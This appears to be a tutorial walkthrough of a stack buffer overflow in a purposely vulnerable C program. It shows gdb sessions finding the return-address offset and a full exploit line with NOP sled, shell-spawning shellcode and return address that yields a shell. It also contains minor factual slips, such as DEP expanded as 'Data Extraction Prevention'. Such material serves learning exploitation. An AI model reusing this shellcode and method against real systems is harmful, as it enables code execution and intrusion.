//CODE:
#include<stdio.h>
#include<string.h>
int main (int argc, char** argv)
{
char buff[50]; // buffer size of 50byte added to stack
strcpy(buff, argv[1]); // takes 1 argument as input and places that into buffer named buff
return 0;
}value within '/proc/sys/kernel/randomize_va_space' must be zero as If, zer0 => ASLR will be disabled
-g - adding exta debugging info for debugging with gdb
-fno-stack-protector - flag to turn off GCC's stack protection mechanism (To do this example which I explained below, we can omit this flag)
-z execstack - this is a compiler option which makes stack executable, disabling a buffer overflow prevention method.
This prevention method is known as DEP (Data Extraction Prevention) method. (If we remove this flag, we can't execute the shellcode within stack as DEP method will be activated)
$ gcc -g -fno-stack-protector -z execstack -o demo demo.c
$ gdb ./demo -q
Reading symbols from ./demo...
+ Defeat ASLR for 1st time ---> This is not ASLR, ASLR is already disabled and
+ Then get the address by using
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555135 <+0>: push rbp
0x0000555555555136 <+1>: mov rbp,rsp
0x0000555555555139 <+4>: sub rsp,0x50
0x000055555555513d <+8>: mov DWORD PTR [rbp-0x44],edi
0x0000555555555140 <+11>: mov QWORD PTR [rbp-0x50],rsi
0x0000555555555144 <+15>: mov rax,QWORD PTR [rbp-0x50]
0x0000555555555148 <+19>: add rax,0x8
0x000055555555514c <+23>: mov rdx,QWORD PTR [rax]
0x000055555555514f <+26>: lea rax,[rbp-0x40]
0x0000555555555153 <+30>: mov rsi,rdx
0x0000555555555156 <+33>: mov rdi,rax
0x0000555555555159 <+36>: call 0x555555555030 <strcpy@plt>
0x000055555555515e <+41>: mov eax,0x0
0x0000555555555163 <+46>: leave
0x0000555555555164 <+47>: ret
End of assembler dump.
+ We will see from where
(gdb) break *0x0000555555555171
Breakpoint 4 at 0x555555555171: file demo.c, line 7.
(gdb) r AAAAAA
Starting program: /home/ubuntu/demo AAAAAA
Breakpoint 4, 0x0000555555555171 in main (argc=2, argv=0x7fffffffe0c8) at demo.c:7
7 strcpy(buff, argv[1]); // takes 1 argument as input and places that into buffer named buff
(gdb) stepi
0x0000555555555050 in strcpy@plt ()
(gdb) x/300x $rsp
0x7fffffffdf78: 0x55555176 0x00005555 0xffffe0c8 0x00007fff
0x7fffffffdf88: 0xffffdfb7 0x00000002 0xffffdfb6 0x00007fff
0x7fffffffdf98: 0x555551cd 0x00005555 0xf7fb1fc8 0x00007fff
0x7fffffffdfa8: 0x55555180 0x00005555 0x00000000 0x00000000
0x7fffffffdfb8: 0x55555060 0x00005555 0xffffe0c0 0x00007fff
0x7fffffffdfc8: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdfd8: 0xf7de80b3 0x00007fff 0xf7ffc620 0x00007fff
0x7fffffffdfe8: 0xffffe0c8 0x00007fff 0x00000000 0x00000002
0x7fffffffdff8: 0x55555149 0x00005555 0x55555180 0x00005555
x --- snip --- x
0x7fffffffe3d8: 0x2f000000 0x656d6f68 0x7562752f 0x2f75746e
0x7fffffffe3e8: 0x6f6d6564 0x|414141|00 0x00|414141| 0x4c454853 ----> 6 number of a
0x7fffffffe3f8: 0x622f3d4c 0x622f6e69 0x00687361 0x53534553
0x7fffffffe408: 0x5f4e4f49 0x414e414d 0x3d524547 0x61636f6c
0x7fffffffe418: 0x65722f6c 0x676e6576 0x742f403a 0x2e2f706d
(gdb) r $(python3 -c 'print("A"*50)')
Starting program: /home/ubuntu/demo $(python3 -c 'print("A"*50)')
Breakpoint 4, 0x0000555555555171 in main (argc=2, argv=0x7fffffffe098) at demo.c:7
7 strcpy(buff, argv[1]); // takes 1 argument as input and places that into buffer named buff
(gdb) stepi
0x0000555555555050 in strcpy@plt ()
(gdb) x/300x $rsp
0x7fffffffdf48: 0x55555176 0x00005555 0xffffe098 0x00007fff
0x7fffffffdf58: 0xffffdf87 0x00000002 0xffffdf86 0x00007fff
0x7fffffffdf68: 0x555551cd 0x00005555 0xf7fb1fc8 0x00007fff
0x7fffffffdf78: 0x55555180 0x00005555 0x00000000 0x00000000
0x7fffffffdf88: 0x55555060 0x00005555 0xffffe090 0x00007fff
0x7fffffffdf98: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdfa8: 0xf7de80b3 0x00007fff 0xf7ffc620 0x00007fff
x --- snip --- x
0x7fffffffe3b8: 0x2f75746e 0x6f6d6564 0x41414100 0x41414141 ---+
0x7fffffffe3c8: 0x41414141 0x41414141 0x41414141 0x41414141 ---|
0x7fffffffe3d8: 0x41414141 0x41414141 0x41414141 0x41414141 ---+ All A are present ....
0x7fffffffe3e8: 0x41414141 0x41414141 0x00414141 0x4c454853 ---|Now lets find the offset, We just need to overwrite rip register/return address
(gdb) del 4
(gdb) r $(python3 -c 'print("A"*56)')
Starting program: /home/ubuntu/demo $(python3 -c 'print("A"*56)')
[Inferior 1 (process 347141) exited normally]
(gdb) c
The program is not being run.
(gdb) r $(python3 -c 'print("A"*50)')
Starting program: /home/ubuntu/demo $(python3 -c 'print("A"*50)')
[Inferior 1 (process 347190) exited normally]
(gdb) r $(python3 -c 'print("A"*80)')
Starting program: /home/ubuntu/demo $(python3 -c 'print("A"*80)')
Program received signal SIGSEGV, Segmentation fault.
0x000055555555517c in main (argc=2, argv=0x7fffffffe088) at demo.c:10
10 }
Now we got a segmentation fault at "73", but here rip register gets overwritten by a single 'A' that we supplied. But we don't want that, we actually want rip register to be overwritten by our supplied address that we want. So, we have to supply "73-1=72" A's to the buffer
(gdb) r $(python3 -c 'print("A"*73)')
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/ubuntu/demo $(python3 -c 'print("A"*73)')
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7de0041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
Now we got the offset at "72":
(gdb) r $(python -c 'print "A" * 72')
Starting program: /home/kali/Desktop/overflow $(python -c 'print "A" * 72')
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e16d00 in __libc_start_main (main=0x555555555135 <main>, argc=2, argv=0x7fffffffe048,
init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe038)
at ../csu/libc-start.c:308
308 ../csu/libc-start.c: No such file or directory.
(gdb) x/300xw $rsp
0x7fffffffdf60: 0xffffe048 0x00007fff 0x00000000 0x00000002
0x7fffffffdf70: 0x55555135 0x00005555 0xf7e167cf 0x00007fff
0x7fffffffdf80: 0x00000000 0x00000000 0x077d3b2b 0xfdb077ec
0x7fffffffdf90: 0x55555050 0x00005555 0x00000000 0x00000000
0x7fffffffdfa0: 0x00000000 0x00000000 0x00000000 0x00000000
0x7fffffffdfb0: 0x1b5d3b2b 0xa8e522b9 0x7c1b3b2b 0xa8e53284
x --- snip --- x
0x7fffffffe3a0: 0x66726576 0x00776f6c 0x41414141 0x41414141
0x7fffffffe3b0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe3c0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe3d0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe3e0: 0x41414141 0x41414141 0x41414141 0x41414141
0x7fffffffe3f0: 0x4c4f4300 0x4746524f 0x313d4742 0x00303b35
0x7fffffffe400: 0x4f4c4f43 0x52455452 0x72743d4d 0x6f636575
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
Executing shellcode:
offset = 72
offset = NOP + shellcode + padding + return address or, offset = NOP + shellcode + return address
(gdb) r $(python -c 'print "\x90" * 45 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "\xb0\xe3\xff\xff\xff\x7f"')Starting program: /home/kali/Desktop/overflow $(python -c 'print "\x90" * 45 + "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" + "\xb0\xe3\xff\xff\xff\x7f"')
process 2337 is executing new program: /usr/bin/dash
$ id
[Detaching after vfork from child process 2340]
uid=1000(kali) gid=1000(kali) groups=1000(kali),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),119(bluetooth),133(scanner),142(kaboxer)
We got a shell !!
$ gdb ./overflow -q
Reading symbols from ./overflow...
+ Defeat ASLR for 1st time and
+ Then get the address by using
(gdb) disassemble main
Dump of assembler code for function main:
0x0000555555555135 <+0>: push rbp
0x0000555555555136 <+1>: mov rbp,rsp
0x0000555555555139 <+4>: sub rsp,0x50
0x000055555555513d <+8>: mov DWORD PTR [rbp-0x44],edi
0x0000555555555140 <+11>: mov QWORD PTR [rbp-0x50],rsi
0x0000555555555144 <+15>: mov rax,QWORD PTR [rbp-0x50]
0x0000555555555148 <+19>: add rax,0x8
0x000055555555514c <+23>: mov rdx,QWORD PTR [rax]
0x000055555555514f <+26>: lea rax,[rbp-0x40]
0x0000555555555153 <+30>: mov rsi,rdx
0x0000555555555156 <+33>: mov rdi,rax
0x0000555555555159 <+36>: call 0x555555555030 <strcpy@plt>
0x000055555555515e <+41>: mov eax,0x0
0x0000555555555163 <+46>: leave
0x0000555555555164 <+47>: ret
End of assembler dump.
+ Just want to analyse the registers seperately
(gdb) r $(python -c 'print "A" * 71')
Starting program: /home/kali/Desktop/overflow $(python -c 'print "A" * 71')
(gdb) info registers
-The program has no registers now. -------------> We ahve to apply brk. pts.
(gdb) b *main+41
Breakpoint 2 at 0x55555555515e: file overflow.c, line 9.
+(gdb) r $(python -c 'print "A" * 71') ------------------------> Just checking what happens just before BOF
Starting program: /home/kali/Desktop/overflow $(python -c 'print "A" * 71')
Breakpoint 2, main (argc=2, argv=0x7fffffffe048) at overflow.c:9
9 return 0;
(gdb) info registers
rax 0x7fffffffdf10 140737488346896
rbx 0x0 0
rcx 0x40 64
rdx 0x10 16
rsi 0x7fffffffe3e0 140737488348128
rdi 0x7fffffffdf47 140737488346951
+rbp 0x7fffffffdf50 0x7fffffffdf50 ----------> base ptr: base of the stack frame. As buffer of 50 byte is present ==> 0x7fffffffdf50 , so 50 byte ahead of rsp ptr, as rbp is present in the higher memory than rsp
+rsp 0x7fffffffdf00 0x7fffffffdf00 -----------> stack ptr: top of the stack. As buffer of 50 byte is present ==> 0x7fffffffdf00 , so trailing by 50 byte (from rbp ptr) as rsp is present in the lower memory than rbp register.
r8 0x0 0
r9 0x7ffff7fe2180 140737354015104
r10 0xfffffffffffff288 -3448
r11 0x7ffff7f50ff0 140737353420784
r12 0x555555555050 93824992235600
r13 0x0 0
r14 0x0 0
r15 0x0 0
+rip 0x55555555515e 0x55555555515e <main+41> -------> It contains the address of the break point.
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) info b
Num Type Disp Enb Address What
2 breakpoint keep y 0x000055555555515e in main at overflow.c:9
breakpoint already hit 1 time
(gdb) c
Continuing.
[Inferior 1 (process 15861) exited normally](gdb) r $(python -c 'print "A" * 72')
Starting program: /home/kali/Desktop/overflow $(python -c 'print "A" * 72')
Breakpoint 2, main (argc=2, argv=0x7fffffffe048) at overflow.c:9
9 return 0;
+(gdb) info registers -----------------------------> Same result like previous as still now return address is not called.
rax 0x7fffffffdf10 140737488346896
rbx 0x0 0
rcx 0x40 64
rdx 0x10 16
rsi 0x7fffffffe3e0 140737488348128
rdi 0x7fffffffdf48 140737488346952
rbp 0x7fffffffdf50 0x7fffffffdf50
rsp 0x7fffffffdf00 0x7fffffffdf00
r8 0x0 0
r9 0x7ffff7fe2180 140737354015104
r10 0xfffffffffffff288 -3448
r11 0x7ffff7f50ff0 140737353420784
r12 0x555555555050 93824992235600
r13 0x0 0
r14 0x0 0
r15 0x0 0
rip 0x55555555515e 0x55555555515e <main+41>
eflags 0x246 [ PF ZF IF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) c
Continuing.
+Program received signal SIGSEGV, Segmentation fault. ---------------------> After continuing got a segmentation fault.
0x00007ffff7e16d00 in __libc_start_main (main=0x555555555135 <main>, argc=2, argv=0x7fffffffe048,
init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end=0x7fffffffe038)
at ../csu/libc-start.c:308
308 ../csu/libc-start.c: No such file or directory.
(gdb) info registers
rax 0x0 0
rbx 0x0 0
rcx 0x40 64
rdx 0x10 16
rsi 0x7fffffffe3e0 140737488348128
rdi 0x7fffffffdf48 140737488346952
+rbp 0x4141414141414141 0x4141414141414141 ---------> rbp gets completely overwritten fully
+ NOTE: So, why rbp ?? why not rsp ??
+ Footnote: (1)
rsp 0x7fffffffdf60 0x7fffffffdf60
r8 0x0 0
r9 0x7ffff7fe2180 140737354015104
r10 0xfffffffffffff288 -3448
r11 0x7ffff7f50ff0 140737353420784
r12 0x555555555050 93824992235600
r13 0x0 0
r14 0x0 0
r15 0x0 0
+rip 0x7ffff7e16d00 0x7ffff7e16d00 <__libc_start_main+224> ----> what is this ???
+ Footnote: (2)
eflags 0x10246 [ PF ZF IF RF ]
cs 0x33 51
ss 0x2b 43
ds 0x0 0
es 0x0 0
fs 0x0 0
gs 0x0 0
(gdb) info b
Num Type Disp Enb Address What
2 breakpoint keep y 0x000055555555515e in main at overflow.c:9
breakpoint already hit 1 timeFootenote, (1): So, why rbp ?? why not rsp ??==> Please refer: here
Footnote, (2): I used objdump with the binary that we were debugging previously
$ objdump -M intel -d ./overflow
./overflow: file format elf64-x86-64
Disassembly of section .init:
0000000000001000 <_init>:
1000: 48 83 ec 08 sub rsp,0x8
1004: 48 8b 05 dd 2f 00 00 mov rax,QWORD PTR [rip+0x2fdd] # 3fe8 <__gmon_start__>
100b: 48 85 c0 test rax,rax
100e: 74 02 je 1012 <_init+0x12>
1010: ff d0 call rax
1012: 48 83 c4 08 add rsp,0x8
1016: c3 ret
Disassembly of section .plt:
0000000000001020 <.plt>:
1020: ff 35 e2 2f 00 00 push QWORD PTR [rip+0x2fe2] # 4008 <_GLOBAL_OFFSET_TABLE_+0x8>
1026: ff 25 e4 2f 00 00 jmp QWORD PTR [rip+0x2fe4] # 4010 <_GLOBAL_OFFSET_TABLE_+0x10>
102c: 0f 1f 40 00 nop DWORD PTR [rax+0x0]
0000000000001030 <strcpy@plt>:
1030: ff 25 e2 2f 00 00 jmp QWORD PTR [rip+0x2fe2] # 4018 <strcpy@GLIBC_2.2.5>
1036: 68 00 00 00 00 push 0x0
103b: e9 e0 ff ff ff jmp 1020 <.plt>
Disassembly of section .plt.got:
0000000000001040 <__cxa_finalize@plt>:
1040: ff 25 b2 2f 00 00 jmp QWORD PTR [rip+0x2fb2] # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
1046: 66 90 xchg ax,ax
Disassembly of section .text:
0000000000001050 <_start>:
1050: 31 ed xor ebp,ebp
1052: 49 89 d1 mov r9,rdx
1055: 5e pop rsi
1056: 48 89 e2 mov rdx,rsp
1059: 48 83 e4 f0 and rsp,0xfffffffffffffff0
105d: 50 push rax
105e: 54 push rsp
105f: 4c 8d 05 6a 01 00 00 lea r8,[rip+0x16a] # 11d0 <__libc_csu_fini>
1066: 48 8d 0d 03 01 00 00 lea rcx,[rip+0x103] # 1170 <__libc_csu_init>
106d: 48 8d 3d c1 00 00 00 lea rdi,[rip+0xc1] # 1135 <main>
1074: ff 15 66 2f 00 00 call QWORD PTR [rip+0x2f66] # 3fe0 <__libc_start_main@GLIBC_2.2.5>
107a: f4 hlt
107b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0]
0000000000001080 <deregister_tm_clones>:
1080: 48 8d 3d a9 2f 00 00 lea rdi,[rip+0x2fa9] # 4030 <__TMC_END__>
1087: 48 8d 05 a2 2f 00 00 lea rax,[rip+0x2fa2] # 4030 <__TMC_END__>
108e: 48 39 f8 cmp rax,rdi
1091: 74 15 je 10a8 <deregister_tm_clones+0x28>
1093: 48 8b 05 3e 2f 00 00 mov rax,QWORD PTR [rip+0x2f3e] # 3fd8 <_ITM_deregisterTMCloneTable>
109a: 48 85 c0 test rax,rax
109d: 74 09 je 10a8 <deregister_tm_clones+0x28>
109f: ff e0 jmp rax
10a1: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
10a8: c3 ret
10a9: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
00000000000010b0 <register_tm_clones>:
10b0: 48 8d 3d 79 2f 00 00 lea rdi,[rip+0x2f79] # 4030 <__TMC_END__>
10b7: 48 8d 35 72 2f 00 00 lea rsi,[rip+0x2f72] # 4030 <__TMC_END__>
10be: 48 29 fe sub rsi,rdi
10c1: 48 89 f0 mov rax,rsi
10c4: 48 c1 ee 3f shr rsi,0x3f
10c8: 48 c1 f8 03 sar rax,0x3
10cc: 48 01 c6 add rsi,rax
10cf: 48 d1 fe sar rsi,1
10d2: 74 14 je 10e8 <register_tm_clones+0x38>
10d4: 48 8b 05 15 2f 00 00 mov rax,QWORD PTR [rip+0x2f15] # 3ff0 <_ITM_registerTMCloneTable>
10db: 48 85 c0 test rax,rax
10de: 74 08 je 10e8 <register_tm_clones+0x38>
10e0: ff e0 jmp rax
10e2: 66 0f 1f 44 00 00 nop WORD PTR [rax+rax*1+0x0]
10e8: c3 ret
10e9: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
00000000000010f0 <__do_global_dtors_aux>:
10f0: 80 3d 39 2f 00 00 00 cmp BYTE PTR [rip+0x2f39],0x0 # 4030 <__TMC_END__>
10f7: 75 2f jne 1128 <__do_global_dtors_aux+0x38>
10f9: 55 push rbp
10fa: 48 83 3d f6 2e 00 00 cmp QWORD PTR [rip+0x2ef6],0x0 # 3ff8 <__cxa_finalize@GLIBC_2.2.5>
1101: 00
1102: 48 89 e5 mov rbp,rsp
1105: 74 0c je 1113 <__do_global_dtors_aux+0x23>
1107: 48 8b 3d 1a 2f 00 00 mov rdi,QWORD PTR [rip+0x2f1a] # 4028 <__dso_handle>
110e: e8 2d ff ff ff call 1040 <__cxa_finalize@plt>
1113: e8 68 ff ff ff call 1080 <deregister_tm_clones>
1118: c6 05 11 2f 00 00 01 mov BYTE PTR [rip+0x2f11],0x1 # 4030 <__TMC_END__>
111f: 5d pop rbp
1120: c3 ret
1121: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
1128: c3 ret
1129: 0f 1f 80 00 00 00 00 nop DWORD PTR [rax+0x0]
0000000000001130 <frame_dummy>:
1130: e9 7b ff ff ff jmp 10b0 <register_tm_clones>
0000000000001135 <main>:
1135: 55 push rbp
1136: 48 89 e5 mov rbp,rsp
1139: 48 83 ec 50 sub rsp,0x50
113d: 89 7d bc mov DWORD PTR [rbp-0x44],edi
1140: 48 89 75 b0 mov QWORD PTR [rbp-0x50],rsi
1144: 48 8b 45 b0 mov rax,QWORD PTR [rbp-0x50]
1148: 48 83 c0 08 add rax,0x8
114c: 48 8b 10 mov rdx,QWORD PTR [rax]
114f: 48 8d 45 c0 lea rax,[rbp-0x40]
1153: 48 89 d6 mov rsi,rdx
1156: 48 89 c7 mov rdi,rax
1159: e8 d2 fe ff ff call 1030 <strcpy@plt>
115e: b8 00 00 00 00 mov eax,0x0
1163: c9 leave
1164: c3 ret
1165: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0]
116c: 00 00 00
116f: 90 nop
0000000000001170 <__libc_csu_init>:
1170: 41 57 push r15
1172: 4c 8d 3d 6f 2c 00 00 lea r15,[rip+0x2c6f] # 3de8 <__frame_dummy_init_array_entry>
1179: 41 56 push r14
117b: 49 89 d6 mov r14,rdx
117e: 41 55 push r13
1180: 49 89 f5 mov r13,rsi
1183: 41 54 push r12
1185: 41 89 fc mov r12d,edi
1188: 55 push rbp
1189: 48 8d 2d 60 2c 00 00 lea rbp,[rip+0x2c60] # 3df0 <__do_global_dtors_aux_fini_array_entry>
1190: 53 push rbx
1191: 4c 29 fd sub rbp,r15
1194: 48 83 ec 08 sub rsp,0x8
1198: e8 63 fe ff ff call 1000 <_init>
119d: 48 c1 fd 03 sar rbp,0x3
11a1: 74 1b je 11be <__libc_csu_init+0x4e>
11a3: 31 db xor ebx,ebx
11a5: 0f 1f 00 nop DWORD PTR [rax]
11a8: 4c 89 f2 mov rdx,r14
11ab: 4c 89 ee mov rsi,r13
11ae: 44 89 e7 mov edi,r12d
11b1: 41 ff 14 df call QWORD PTR [r15+rbx*8]
11b5: 48 83 c3 01 add rbx,0x1
11b9: 48 39 dd cmp rbp,rbx
11bc: 75 ea jne 11a8 <__libc_csu_init+0x38>
11be: 48 83 c4 08 add rsp,0x8
11c2: 5b pop rbx
11c3: 5d pop rbp
11c4: 41 5c pop r12
11c6: 41 5d pop r13
11c8: 41 5e pop r14
11ca: 41 5f pop r15
11cc: c3 ret
11cd: 0f 1f 00 nop DWORD PTR [rax]
00000000000011d0 <__libc_csu_fini>:
11d0: c3 ret
Disassembly of section .fini:
00000000000011d4 <_fini>:
11d4: 48 83 ec 08 sub rsp,0x8
11d8: 48 83 c4 08 add rsp,0x8
11dc: c3 ret
kali@reveng ~/Desktop> objdump -M intel -d ./overflow | grep __libc_start_main
+ 1074: ff 15 66 2f 00 00 call QWORD PTR [rip+0x2f66] # 3fe0 <__libc_start_main@GLIBC_2.2.5>So, what is the significance of the __libc_start_main here ???
x --- snip --- x
Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7e10041 in ?? () from /lib/x86_64-linux-gnu/libc.so.6
(gdb) info registers
x --- snip --- x
rbp 0x4141414141414141 0x4141414141414141
rsp 0x7fffffffdf60 0x7fffffffdf60
x --- snip --- x
+rip 0x7ffff7e10041 0x7ffff7e10041 ------> rip gets overwritten by one 'A' characterThis will go on till '78', other things are shown earlier, "shellcode and getting shell" sort of stuffs.